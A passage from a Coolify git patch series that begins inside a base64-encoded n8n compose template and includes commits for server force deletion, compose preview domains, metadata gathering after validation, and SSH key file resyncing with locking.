HA6Ly8xMjcuMC4wLjE6NTY3OC8nCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAKICBuOG4td29ya2VyOgogICAgaW1hZ2U6ICduOG5pby9uOG46Mi4xMC40JwogICAgY29tbWFuZDogd29ya2VyCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnR0VORVJJQ19USU1FWk9ORT0ke0dFTkVSSUNfVElNRVpPTkU6LVVUQ30nCiAgICAgIC0gJ1RaPSR7VFo6LVVUQ30nCiAgICAgIC0gREJfVFlQRT1wb3N0Z3Jlc2RiCiAgICAgIC0gJ0RCX1BPU1RHUkVTREJfREFUQUJBU0U9JHtQT1NUR1JFU19EQjotbjhufScKICAgICAgLSBEQl9QT1NUR1JFU0RCX0hPU1Q9cG9zdGdyZXNxbAogICAgICAtIERCX1BPU1RHUkVTREJfUE9SVD01NDMyCiAgICAgIC0gREJfUE9TVEdSRVNEQl9VU0VSPSRTRVJWSUNFX1VTRVJfUE9TVEdSRVMKICAgICAgLSBEQl9QT1NUR1JFU0RCX1NDSEVNQT1wdWJsaWMKICAgICAgLSBEQl9QT1NUR1JFU0RCX1BBU1NXT1JEPSRTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTCiAgICAgIC0gRVhFQ1VUSU9OU19NT0RFPXF1ZXVlCiAgICAgIC0gUVVFVUVfQlVMTF9SRURJU19IT1NUPXJlZGlzCiAgICAgIC0gUVVFVUVfSEVBTFRIX0NIRUNLX0FDVElWRT10cnVlCiAgICAgIC0gJ044Tl9FTkNSWVBUSU9OX0tFWT0ke1NFUlZJQ0VfUEFTU1dPUkRfRU5DUllQVElPTn0nCiAgICAgIC0gTjhOX1JVTk5FUlNfRU5BQkxFRD10cnVlCiAgICAgIC0gTjhOX1JVTk5FUlNfTU9ERT1leHRlcm5hbAogICAgICAtICdOOE5fUlVOTkVSU19CUk9LRVJfTElTVEVOX0FERFJFU1M9JHtOOE5fUlVOTkVSU19CUk9LRVJfTElTVEVOX0FERFJFU1M6LTAuMC4wLjB9JwogICAgICAtICdOOE5fUlVOTkVSU19CUk9LRVJfUE9SVD0ke044Tl9SVU5ORVJTX0JST0tFUl9QT1JUOi01Njc5fScKICAgICAgLSBOOE5fUlVOTkVSU19BVVRIX1RPS0VOPSRTRVJWSUNFX1BBU1NXT1JEX044TgogICAgICAtICdOOE5fTkFUSVZFX1BZVEhPTl9SVU5ORVI9JHtOOE5fTkFUSVZFX1BZVEhPTl9SVU5ORVI6LXRydWV9JwogICAgICAtICdOOE5fUlVOTkVSU19NQVhfQ09OQ1VSUkVOQ1k9JHtOOE5fUlVOTkVSU19NQVhfQ09OQ1VSUkVOQ1k6LTV9JwogICAgICAtICdOOE5fQkxPQ0tfRU5WX0FDQ0VTU19JTl9OT0RFPSR7TjhOX0JMT0NLX0VOVl9BQ0NFU1NfSU5fTk9ERTotdHJ1ZX0nCiAgICAgIC0gJ044Tl9HSVRfTk9ERV9ESVNBQkxFX0JBUkVfUkVQT1M9JHtOOE5fR0lUX05PREVfRElTQUJMRV9CQVJFX1JFUE9TOi10cnVlfScKICAgICAgLSAnTjhOX0VORk9SQ0VfU0VUVElOR1NfRklMRV9QRVJNSVNTSU9OUz0ke044Tl9FTkZPUkNFX1NFVFRJTkdTX0ZJTEVfUEVSTUlTU0lPTlM6LXRydWV9JwogICAgICAtICdOOE5fUFJPWFlfSE9QUz0ke044Tl9QUk9YWV9IT1BTOi0xfScKICAgICAgLSAnTjhOX1NLSVBfQVVUSF9PTl9PQVVUSF9DQUxMQkFDSz0ke044Tl9TS0lQX0FVVEhfT05fT0FVVEhfQ0FMTEJBQ0s6LWZhbHNlfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ244bi1kYXRhOi9ob21lL25vZGUvLm44bicKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAnd2dldCAtcU8tIGh0dHA6Ly8xMjcuMC4wLjE6NTY3OC9oZWFsdGh6JwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDEwCiAgICBkZXBlbmRzX29uOgogICAgICBuOG46CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgcG9zdGdyZXNxbDoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICByZWRpczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogIHBvc3RncmVzcWw6CiAgICBpbWFnZTogJ3Bvc3RncmVzOjE2LWFscGluZScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ3Bvc3RncmVzcWwtZGF0YTovdmFyL2xpYi9wb3N0Z3Jlc3FsL2RhdGEnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBQT1NUR1JFU19VU0VSPSRTRVJWSUNFX1VTRVJfUE9TVEdSRVMKICAgICAgLSBQT1NUR1JFU19QQVNTV09SRD0kU0VSVklDRV9QQVNTV09SRF9QT1NUR1JFUwogICAgICAtICdQT1NUR1JFU19EQj0ke1BPU1RHUkVTX0RCOi1uOG59JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdwZ19pc3JlYWR5IC1VICQke1BPU1RHUkVTX1VTRVJ9IC1kICQke1BPU1RHUkVTX0RCfScKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAogIHJlZGlzOgogICAgaW1hZ2U6ICdyZWRpczo2LWFscGluZScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ3JlZGlzLWRhdGE6L2RhdGEnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gcmVkaXMtY2xpCiAgICAgICAgLSBwaW5nCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiAxMAogIHRhc2stcnVubmVyczoKICAgIGltYWdlOiAnbjhuaW8vcnVubmVyczoyLjEwLjQnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnTjhOX1JVTk5FUlNfVEFTS19CUk9LRVJfVVJJPSR7TjhOX1JVTk5FUlNfVEFTS19CUk9LRVJfVVJJOi1odHRwOi8vbjhuLXdvcmtlcjo1Njc5fScKICAgICAgLSBOOE5fUlVOTkVSU19BVVRIX1RPS0VOPSRTRVJWSUNFX1BBU1NXT1JEX044TgogICAgICAtICdOOE5fUlVOTkVSU19BVVRPX1NIVVRET1dOX1RJTUVPVVQ9JHtOOE5fUlVOTkVSU19BVVRPX1NIVVRET1dOX1RJTUVPVVQ6LTE1fScKICAgICAgLSAnTjhOX1JVTk5FUlNfTUFYX0NPTkNVUlJFTkNZPSR7TjhOX1JVTk5FUlNfTUFYX0NPTkNVUlJFTkNZOi01fScKICAgIGRlcGVuZHNfb246CiAgICAgIC0gbjhuCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ3dnZXQgLXFPLSBodHRwOi8vMTI3LjAuMC4xOjU2ODAvJwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDEwCg==",
         "tags": [
             "n8n",
             "workflow",
diff --git a/tests/Unit/DockerComposePreserveRepositoryStartCommandTest.php b/tests/Unit/DockerComposePreserveRepositoryStartCommandTest.php
index 2d33b60f9..4d69d0894 100644
--- a/tests/Unit/DockerComposePreserveRepositoryStartCommandTest.php
+++ b/tests/Unit/DockerComposePreserveRepositoryStartCommandTest.php
@@ -75,6 +75,55 @@
     expect($startCommand)->toContain("-f {$serverWorkdir}{$composeLocation}");
 });
 
+it('injects --project-directory with host path when preserveRepository is true', function () {
+    $serverWorkdir = '/data/coolify/applications/app-uuid';
+    $containerWorkdir = '/artifacts/deployment-uuid';
+    $preserveRepository = true;
+
+    $customStartCommand = 'docker compose -f docker-compose.yaml -f docker-compose.prod.yaml up -d';
+
+    // Simulate the --project-directory injection from deploy_docker_compose_buildpack()
+    if (! str($customStartCommand)->contains('--project-directory')) {
+        $projectDir = $preserveRepository ? $serverWorkdir : $containerWorkdir;
+        $customStartCommand = str($customStartCommand)->replaceFirst('compose', 'compose --project-directory '.$projectDir)->value();
+    }
+
+    // When preserveRepository is true, --project-directory must point to host path
+    expect($customStartCommand)->toContain("--project-directory {$serverWorkdir}");
+    expect($customStartCommand)->not->toContain('/artifacts/');
+});
+
+it('injects --project-directory with container path when preserveRepository is false', function () {
+    $serverWorkdir = '/data/coolify/applications/app-uuid';
+    $containerWorkdir = '/artifacts/deployment-uuid';
+    $preserveRepository = false;
+
+    $customStartCommand = 'docker compose -f docker-compose.yaml -f docker-compose.prod.yaml up -d';
+
+    // Simulate the --project-directory injection from deploy_docker_compose_buildpack()
+    if (! str($customStartCommand)->contains('--project-directory')) {
+        $projectDir = $preserveRepository ? $serverWorkdir : $containerWorkdir;
+        $customStartCommand = str($customStartCommand)->replaceFirst('compose', 'compose --project-directory '.$projectDir)->value();
+    }
+
+    // When preserveRepository is false, --project-directory must point to container path
+    expect($customStartCommand)->toContain("--project-directory {$containerWorkdir}");
+    expect($customStartCommand)->not->toContain('/data/coolify/applications/');
+});
+
+it('does not override explicit --project-directory in custom start command', function () {
+    $customProjectDir = '/custom/path';
+    $customStartCommand = "docker compose --project-directory {$customProjectDir} up -d";
+
+    // Simulate the --project-directory injection — should be skipped
+    if (! str($customStartCommand)->contains('--project-directory')) {
+        $customStartCommand = str($customStartCommand)->replaceFirst('compose', 'compose --project-directory /should-not-appear')->value();
+    }
+
+    expect($customStartCommand)->toContain("--project-directory {$customProjectDir}");
+    expect($customStartCommand)->not->toContain('/should-not-appear');
+});
+
 it('uses container paths for env-file when preserveRepository is false', function () {
     $workdir = '/artifacts/deployment-uuid/backend';
     $composeLocation = '/compose.yml';

From b8390482b8a9b09a61a38fbe22857a9ec5f8b697 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Fri, 13 Mar 2026 16:58:26 +0100
Subject: [PATCH 063/213] feat(server): allow force deletion of servers with
 resources

Add ability to force delete servers along with their defined resources:
- API: Accept ?force=true query parameter in DELETE /servers endpoint
- UI: Display checkbox option to delete all resources in deletion dialog

When force deletion is enabled, all associated resources are dispatched
via DeleteResourceJob before the server is removed, enabling one-step
deletion instead of requiring manual resource cleanup first.
---
 .../Controllers/Api/ServersController.php     | 15 ++++++++++--
 app/Livewire/Server/Delete.php                | 23 +++++++++++++++++--
 openapi.json                                  | 10 ++++++++
 openapi.yaml                                  |  8 +++++++
 .../views/livewire/server/delete.blade.php    |  2 +-
 .../views/livewire/server/navbar.blade.php    |  2 +-
 6 files changed, 54 insertions(+), 6 deletions(-)

diff --git a/app/Http/Controllers/Api/ServersController.php b/app/Http/Controllers/Api/ServersController.php
index 892457925..da94521a8 100644
--- a/app/Http/Controllers/Api/ServersController.php
+++ b/app/Http/Controllers/Api/ServersController.php
@@ -7,6 +7,7 @@
 use App\Enums\ProxyStatus;
 use App\Enums\ProxyTypes;
 use App\Http\Controllers\Controller;
+use App\Jobs\DeleteResourceJob;
 use App\Models\Application;
 use App\Models\PrivateKey;
 use App\Models\Project;
@@ -758,12 +759,22 @@ public function delete_server(Request $request)
         if (! $server) {
             return response()->json(['message' => 'Server not found.'], 404);
         }
-        if ($server->definedResources()->count() > 0) {
-            return response()->json(['message' => 'Server has resources, so you need to delete them before.'], 400);
+
+        $force = filter_var($request->query('force', false), FILTER_VALIDATE_BOOLEAN);
+
+        if ($server->definedResources()->count() > 0 && ! $force) {
+            return response()->json(['message' => 'Server has resources. Use ?force=true to delete all resources and the server, or delete resources manually first.'], 400);
         }
         if ($server->isLocalhost()) {
             return response()->json(['message' => 'Local server cannot be deleted.'], 400);
         }
+
+        if ($force) {
+            foreach ($server->definedResources() as $resource) {
+                DeleteResourceJob::dispatch($resource);
+            }
+        }
+
         $server->delete();
         DeleteServer::dispatch(
             $server->id,
diff --git a/app/Livewire/Server/Delete.php b/app/Livewire/Server/Delete.php
index beb8c0a12..d06543b39 100644
--- a/app/Livewire/Server/Delete.php
+++ b/app/Livewire/Server/Delete.php
@@ -3,6 +3,7 @@
 namespace App\Livewire\Server;
 
 use App\Actions\Server\DeleteServer;
+use App\Jobs\DeleteResourceJob;
 use App\Models\Server;
 use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
 use Livewire\Component;
@@ -15,6 +16,8 @@ class Delete extends Component
 
     public bool $delete_from_hetzner = false;
 
+    public bool $force_delete_resources = false;
+
     public function mount(string $server_uuid)
     {
         try {
@@ -32,15 +35,22 @@ public function delete($password, $selectedActions = [])
 
         if (! empty($selectedActions)) {
             $this->delete_from_hetzner = in_array('delete_from_hetzner', $selectedActions);
+            $this->force_delete_resources = in_array('force_delete_resources', $selectedActions);
         }
         try {
             $this->authorize('delete', $this->server);
-            if ($this->server->hasDefinedResources()) {
-                $this->dispatch('error', 'Server has defined resources. Please delete them first.');
+            if ($this->server->hasDefinedResources() && ! $this->force_delete_resources) {
+                $this->dispatch('error', 'Server has defined resources. Please delete them first or select "Delete all resources".');
 
                 return;
             }
 
+            if ($this->force_delete_resources) {
+                foreach ($this->server->definedResources() as $resource) {
+                    DeleteResourceJob::dispatch($resource);
+                }
+            }
+
             $this->server->delete();
             DeleteServer::dispatch(
                 $this->server->id,
@@ -60,6 +70,15 @@ public function render()
     {
         $checkboxes = [];
 
+        if ($this->server->hasDefinedResources()) {
+            $resourceCount = $this->server->definedResources()->count();
+            $checkboxes[] = [
+                'id' => 'force_delete_resources',
+                'label' => "Delete all resources ({$resourceCount} total)",
+                'default_warning' => 'Server cannot be deleted while it has resources.',
+            ];
+        }
+
         if ($this->server->hetzner_server_id) {
             $checkboxes[] = [
                 'id' => 'delete_from_hetzner',
diff --git a/openapi.json b/openapi.json
index 849dee363..f5d9813b3 100644
--- a/openapi.json
+++ b/openapi.json
@@ -9685,6 +9685,11 @@
                                         "type": "boolean",
                                         "default": false,
                                         "description": "Force domain override even if conflicts are detected."
+                                    },
+                                    "is_container_label_escape_enabled": {
+                                        "type": "boolean",
+                                        "default": true,
+                                        "description": "Escape special characters in labels. By default, $ (and other chars) is escaped. If you want to use env variables inside the labels, turn this off."
                                     }
                                 },
                                 "type": "object"
@@ -10011,6 +10016,11 @@
                                         "type": "boolean",
                                         "default": false,
                                         "description": "Force domain override even if conflicts are detected."
+                                    },
+                                    "is_container_label_escape_enabled": {
+                                        "type": "boolean",
+                                        "default": true,
+                                        "description": "Escape special characters in labels. By default, $ (and other chars) is escaped. If you want to use env variables inside the labels, turn this off."
                                     }
                                 },
                                 "type": "object"
diff --git a/openapi.yaml b/openapi.yaml
index 226295cdb..81753544f 100644
--- a/openapi.yaml
+++ b/openapi.yaml
@@ -6152,6 +6152,10 @@ paths:
                   type: boolean
                   default: false
                   description: 'Force domain override even if conflicts are detected.'
+                is_container_label_escape_enabled:
+                  type: boolean
+                  default: true
+                  description: 'Escape special characters in labels. By default, $ (and other chars) is escaped. If you want to use env variables inside the labels, turn this off.'
               type: object
       responses:
         '201':
@@ -6337,6 +6341,10 @@ paths:
                   type: boolean
                   default: false
                   description: 'Force domain override even if conflicts are detected.'
+                is_container_label_escape_enabled:
+                  type: boolean
+                  default: true
+                  description: 'Escape special characters in labels. By default, $ (and other chars) is escaped. If you want to use env variables inside the labels, turn this off.'
               type: object
       responses:
         '200':
diff --git a/resources/views/livewire/server/delete.blade.php b/resources/views/livewire/server/delete.blade.php
index 073849452..dec1d3f6d 100644
--- a/resources/views/livewire/server/delete.blade.php
+++ b/resources/views/livewire/server/delete.blade.php
@@ -14,7 +14,7 @@
                     back!
                 </div>
                 @if ($server->definedResources()->count() > 0)
-                    <div class="pb-2 text-red-500">You need to delete all resources before deleting this server.</div>
+                    <div class="pb-2 text-red-500">This server has resources. You can force delete all resources by checking the option below.</div>
                 @endif
 
                 <x-modal-confirmation title="Confirm Server Deletion?" isErrorButton buttonTitle="Delete"
diff --git a/resources/views/livewire/server/navbar.blade.php b/resources/views/livewire/server/navbar.blade.php
index 4be11f51a..4e53cd80e 100644
--- a/resources/views/livewire/server/navbar.blade.php
+++ b/resources/views/livewire/server/navbar.blade.php
@@ -62,7 +62,7 @@ class="mx-1 dark:hover:fill-white fill-black dark:fill-warning">
     <div class="subtitle">{{ data_get($server, 'name') }}</div>
     <div class="navbar-main">
         <nav
-            class="flex items-center gap-4 overflow-x-scroll sm:overflow-x-hidden scrollbar min-h-10 whitespace-nowrap pt-2">
+            class="flex items-center gap-6 overflow-x-scroll sm:overflow-x-hidden scrollbar min-h-10 whitespace-nowrap pt-2">
             <a class="{{ request()->routeIs('server.show') ? 'dark:text-white' : '' }}" href="{{ route('server.show', [
     'server_uuid' => data_get($server, 'uuid'),
 ]) }}" {{ wireNavigate() }}>

From c39a287b47a7a8aeeba4ae5e533638f5a4cde2b8 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Fri, 13 Mar 2026 17:02:05 +0100
Subject: [PATCH 064/213] feat(compose-preview): populate fqdn from
 docker_compose_domains

The generate_preview_fqdn_compose method now extracts and populates the fqdn field from docker_compose_domains, making it available for webhook notifications. This handles multiple domains across services and gracefully sets fqdn to null when no domains are configured.
---
 app/Models/ApplicationPreview.php        | 10 +++
 tests/Feature/ComposePreviewFqdnTest.php | 77 ++++++++++++++++++++++++
 2 files changed, 87 insertions(+)
 create mode 100644 tests/Feature/ComposePreviewFqdnTest.php

diff --git a/app/Models/ApplicationPreview.php b/app/Models/ApplicationPreview.php
index 7373fdb16..3b7bf3030 100644
--- a/app/Models/ApplicationPreview.php
+++ b/app/Models/ApplicationPreview.php
@@ -166,6 +166,16 @@ public function generate_preview_fqdn_compose()
         }
 
         $this->docker_compose_domains = json_encode($docker_compose_domains);
+
+        // Populate fqdn from generated domains so webhook notifications can read it
+        $allDomains = collect($docker_compose_domains)
+            ->pluck('domain')
+            ->filter(fn ($d) => ! empty($d))
+            ->flatMap(fn ($d) => explode(',', $d))
+            ->implode(',');
+
+        $this->fqdn = ! empty($allDomains) ? $allDomains : null;
+
         $this->save();
     }
 }
diff --git a/tests/Feature/ComposePreviewFqdnTest.php b/tests/Feature/ComposePreviewFqdnTest.php
new file mode 100644
index 000000000..c62f905d6
--- /dev/null
+++ b/tests/Feature/ComposePreviewFqdnTest.php
@@ -0,0 +1,77 @@
+<?php
+
+use App\Models\Application;
+use App\Models\ApplicationPreview;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+
+uses(RefreshDatabase::class);
+
+it('populates fqdn from docker_compose_domains after generate_preview_fqdn_compose', function () {
+    $application = Application::factory()->create([
+        'build_pack' => 'dockercompose',
+        'docker_compose_domains' => json_encode([
+            'web' => ['domain' => 'https://example.com'],
+        ]),
+    ]);
+
+    $preview = ApplicationPreview::create([
+        'application_id' => $application->id,
+        'pull_request_id' => 42,
+        'docker_compose_domains' => $application->docker_compose_domains,
+    ]);
+
+    $preview->generate_preview_fqdn_compose();
+
+    $preview->refresh();
+
+    expect($preview->fqdn)->not->toBeNull();
+    expect($preview->fqdn)->toContain('42');
+    expect($preview->fqdn)->toContain('example.com');
+});
+
+it('populates fqdn with multiple domains from multiple services', function () {
+    $application = Application::factory()->create([
+        'build_pack' => 'dockercompose',
+        'docker_compose_domains' => json_encode([
+            'web' => ['domain' => 'https://web.example.com'],
+            'api' => ['domain' => 'https://api.example.com'],
+        ]),
+    ]);
+
+    $preview = ApplicationPreview::create([
+        'application_id' => $application->id,
+        'pull_request_id' => 7,
+        'docker_compose_domains' => $application->docker_compose_domains,
+    ]);
+
+    $preview->generate_preview_fqdn_compose();
+
+    $preview->refresh();
+
+    expect($preview->fqdn)->not->toBeNull();
+    $domains = explode(',', $preview->fqdn);
+    expect($domains)->toHaveCount(2);
+    expect($preview->fqdn)->toContain('web.example.com');
+    expect($preview->fqdn)->toContain('api.example.com');
+});
+
+it('sets fqdn to null when no domains are configured', function () {
+    $application = Application::factory()->create([
+        'build_pack' => 'dockercompose',
+        'docker_compose_domains' => json_encode([
+            'web' => ['domain' => ''],
+        ]),
+    ]);
+
+    $preview = ApplicationPreview::create([
+        'application_id' => $application->id,
+        'pull_request_id' => 99,
+        'docker_compose_domains' => $application->docker_compose_domains,
+    ]);
+
+    $preview->generate_preview_fqdn_compose();
+
+    $preview->refresh();
+
+    expect($preview->fqdn)->toBeNull();
+});

From 1936bb08bf707311577cff45344008d0dfe1888a Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Fri, 13 Mar 2026 17:07:50 +0100
Subject: [PATCH 065/213] feat(server): auto-fetch server metadata after
 validation

Server metadata is now automatically gathered when server validation completes successfully, both in the async job and Livewire component. This ensures server details (OS, CPU count, etc.) are populated immediately after validation passes, improving the user experience without requiring manual metadata fetching.

Tests added to verify gatherServerMetadata is called on successful validation and skipped when validation fails.
---
 app/Jobs/ValidateAndInstallServerJob.php   |  3 +++
 app/Livewire/Server/ValidateAndInstall.php |  3 +++
 tests/Feature/ServerMetadataTest.php       | 23 ++++++++++++++++++++++
 3 files changed, 29 insertions(+)

diff --git a/app/Jobs/ValidateAndInstallServerJob.php b/app/Jobs/ValidateAndInstallServerJob.php
index 9f02f9b78..288904471 100644
--- a/app/Jobs/ValidateAndInstallServerJob.php
+++ b/app/Jobs/ValidateAndInstallServerJob.php
@@ -179,6 +179,9 @@ public function handle(): void
             // Mark validation as complete
             $this->server->update(['is_validating' => false]);
 
+            // Auto-fetch server details now that validation passed
+            $this->server->gatherServerMetadata();
+
             // Refresh server to get latest state
             $this->server->refresh();
 
diff --git a/app/Livewire/Server/ValidateAndInstall.php b/app/Livewire/Server/ValidateAndInstall.php
index 1a5bd381b..198d823b9 100644
--- a/app/Livewire/Server/ValidateAndInstall.php
+++ b/app/Livewire/Server/ValidateAndInstall.php
@@ -198,6 +198,9 @@ public function validateDockerVersion()
                 // Mark validation as complete
                 $this->server->update(['is_validating' => false]);
 
+                // Auto-fetch server details now that validation passed
+                $this->server->gatherServerMetadata();
+
                 $this->dispatch('refreshServerShow');
                 $this->dispatch('refreshBoardingIndex');
                 ServerValidated::dispatch($this->server->team_id, $this->server->uuid);
diff --git a/tests/Feature/ServerMetadataTest.php b/tests/Feature/ServerMetadataTest.php
index fcd515de9..204ae456d 100644
--- a/tests/Feature/ServerMetadataTest.php
+++ b/tests/Feature/ServerMetadataTest.php
@@ -1,9 +1,11 @@
 <?php
 
+use App\Livewire\Server\ValidateAndInstall;
 use App\Models\Server;
 use App\Models\Team;
 use App\Models\User;
 use Illuminate\Foundation\Testing\RefreshDatabase;
+use Livewire\Livewire;
 
 uses(RefreshDatabase::class);
 
@@ -94,3 +96,24 @@
     expect($this->server->server_metadata['os'])->toBe('Ubuntu 22.04')
         ->and($this->server->server_metadata['cpus'])->toBe(4);
 });
+
+it('calls gatherServerMetadata during ValidateAndInstall when docker version is valid', function () {
+    $serverMock = Mockery::mock($this->server)->makePartial();
+    $serverMock->shouldReceive('isSwarm')->andReturn(false);
+    $serverMock->shouldReceive('validateDockerEngineVersion')->once()->andReturn('24.0.0');
+    $serverMock->shouldReceive('gatherServerMetadata')->once();
+    $serverMock->shouldReceive('isBuildServer')->andReturn(false);
+
+    Livewire::test(ValidateAndInstall::class, ['server' => $serverMock])
+        ->call('validateDockerVersion');
+});
+
+it('does not call gatherServerMetadata when docker version validation fails', function () {
+    $serverMock = Mockery::mock($this->server)->makePartial();
+    $serverMock->shouldReceive('isSwarm')->andReturn(false);
+    $serverMock->shouldReceive('validateDockerEngineVersion')->once()->andReturn(false);
+    $serverMock->shouldNotReceive('gatherServerMetadata');
+
+    Livewire::test(ValidateAndInstall::class, ['server' => $serverMock])
+        ->call('validateDockerVersion');
+});

From 4bf94fac2d2c006ed2d6c2760d6001543cda06de Mon Sep 17 00:00:00 2001
From: pannous <info@pannous.com>
Date: Sun, 15 Mar 2026 03:06:21 +0100
Subject: [PATCH 066/213] fix: prevent sporadic SSH permission denied by
 validating key content

The root cause of sporadic "Permission denied (publickey)" errors was
that validateSshKey() only checked if the key file existed on disk,
never verifying its content matched the database. When keys were rotated
or updated, the stale file persisted and SSH used the wrong key.

Changes:
- validateSshKey() now refreshes key from DB and compares file content
- Server saved event detects private_key_id changes to invalidate mux
- PrivateKey storeInFileSystem() uses file locking to prevent races
- PrivateKey saved event auto-resyncs file on key content changes
- Enforces 0600 permissions on key files

Fixes coollabsio/coolify#7724
---
 app/Helpers/SshMultiplexingHelper.php |  33 ++++++-
 app/Models/PrivateKey.php             |  67 ++++++++++---
 app/Models/Server.php                 |   2 +-
 tests/Unit/SshKeyValidationTest.php   | 133 ++++++++++++++++++++++++++
 4 files changed, 215 insertions(+), 20 deletions(-)
 create mode 100644 tests/Unit/SshKeyValidationTest.php

diff --git a/app/Helpers/SshMultiplexingHelper.php b/app/Helpers/SshMultiplexingHelper.php
index 54d5714a6..b9a3e98f3 100644
--- a/app/Helpers/SshMultiplexingHelper.php
+++ b/app/Helpers/SshMultiplexingHelper.php
@@ -8,6 +8,7 @@
 use Illuminate\Support\Facades\Hash;
 use Illuminate\Support\Facades\Log;
 use Illuminate\Support\Facades\Process;
+use Illuminate\Support\Facades\Storage;
 
 class SshMultiplexingHelper
 {
@@ -208,13 +209,37 @@ private static function isMultiplexingEnabled(): bool
 
     private static function validateSshKey(PrivateKey $privateKey): void
     {
-        $keyLocation = $privateKey->getKeyLocation();
-        $checkKeyCommand = "ls $keyLocation 2>/dev/null";
-        $keyCheckProcess = Process::run($checkKeyCommand);
+        $privateKey->refresh();
 
-        if ($keyCheckProcess->exitCode() !== 0) {
+        $keyLocation = $privateKey->getKeyLocation();
+        $filename = "ssh_key@{$privateKey->uuid}";
+        $disk = Storage::disk('ssh-keys');
+
+        $needsRewrite = false;
+
+        if (! $disk->exists($filename)) {
+            $needsRewrite = true;
+        } else {
+            $diskContent = $disk->get($filename);
+            if ($diskContent !== $privateKey->private_key) {
+                Log::warning('SSH key file content does not match database, resyncing', [
+                    'key_uuid' => $privateKey->uuid,
+                ]);
+                $needsRewrite = true;
+            }
+        }
+
+        if ($needsRewrite) {
             $privateKey->storeInFileSystem();
         }
+
+        // Ensure correct permissions (SSH requires 0600)
+        if (file_exists($keyLocation)) {
+            $currentPerms = fileperms($keyLocation) & 0777;
+            if ($currentPerms !== 0600) {
+                chmod($keyLocation, 0600);
+            }
+        }
     }
 
     private static function getCommonSshOptions(Server $server, string $sshKeyLocation, int $connectionTimeout, int $serverInterval, bool $isScp = false): string
diff --git a/app/Models/PrivateKey.php b/app/Models/PrivateKey.php
index 7163ae7b5..b453e999d 100644
--- a/app/Models/PrivateKey.php
+++ b/app/Models/PrivateKey.php
@@ -65,6 +65,20 @@ protected static function booted()
             }
         });
 
+        static::saved(function ($key) {
+            if ($key->wasChanged('private_key')) {
+                try {
+                    $key->storeInFileSystem();
+                    refresh_server_connection($key);
+                } catch (\Exception $e) {
+                    \Illuminate\Support\Facades\Log::error('Failed to resync SSH key after update', [
+                        'key_uuid' => $key->uuid,
+                        'error' => $e->getMessage(),
+                    ]);
+                }
+            }
+        });
+
         static::deleted(function ($key) {
             self::deleteFromStorage($key);
         });
@@ -185,29 +199,52 @@ public function storeInFileSystem()
     {
         $filename = "ssh_key@{$this->uuid}";
         $disk = Storage::disk('ssh-keys');
+        $keyLocation = $this->getKeyLocation();
+        $lockFile = $keyLocation.'.lock';
 
         // Ensure the storage directory exists and is writable
         $this->ensureStorageDirectoryExists();
 
-        // Attempt to store the private key
-        $success = $disk->put($filename, $this->private_key);
-
-        if (! $success) {
-            throw new \Exception("Failed to write SSH key to filesystem. Check disk space and permissions for: {$this->getKeyLocation()}");
+        // Use file locking to prevent concurrent writes from corrupting the key
+        $lockHandle = fopen($lockFile, 'c');
+        if ($lockHandle === false) {
+            throw new \Exception("Failed to open lock file for SSH key: {$lockFile}");
         }
 
-        // Verify the file was actually created and has content
-        if (! $disk->exists($filename)) {
-            throw new \Exception("SSH key file was not created: {$this->getKeyLocation()}");
-        }
+        try {
+            if (! flock($lockHandle, LOCK_EX)) {
+                throw new \Exception("Failed to acquire lock for SSH key: {$keyLocation}");
+            }
 
-        $storedContent = $disk->get($filename);
-        if (empty($storedContent) || $storedContent !== $this->private_key) {
-            $disk->delete($filename); // Clean up the bad file
-            throw new \Exception("SSH key file content verification failed: {$this->getKeyLocation()}");
-        }
+            // Attempt to store the private key
+            $success = $disk->put($filename, $this->private_key);
 
-        return $this->getKeyLocation();
+            if (! $success) {
+                throw new \Exception("Failed to write SSH key to filesystem. Check disk space and permissions for: {$keyLocation}");
+            }
+
+            // Verify the file was actually created and has content
+            if (! $disk->exists($filename)) {
+                throw new \Exception("SSH key file was not created: {$keyLocation}");
+            }
+
+            $storedContent = $disk->get($filename);
+            if (empty($storedContent) || $storedContent !== $this->private_key) {
+                $disk->delete($filename); // Clean up the bad file
+                throw new \Exception("SSH key file content verification failed: {$keyLocation}");
+            }
+
+            // Ensure correct permissions for SSH (0600 required)
+            if (file_exists($keyLocation)) {
+                chmod($keyLocation, 0600);
+            }
+
+            return $keyLocation;
+        } finally {
+            flock($lockHandle, LOCK_UN);
+            fclose($lockHandle);
+            @unlink($lockFile);
+        }
     }
 
     public static function deleteFromStorage(self $privateKey)
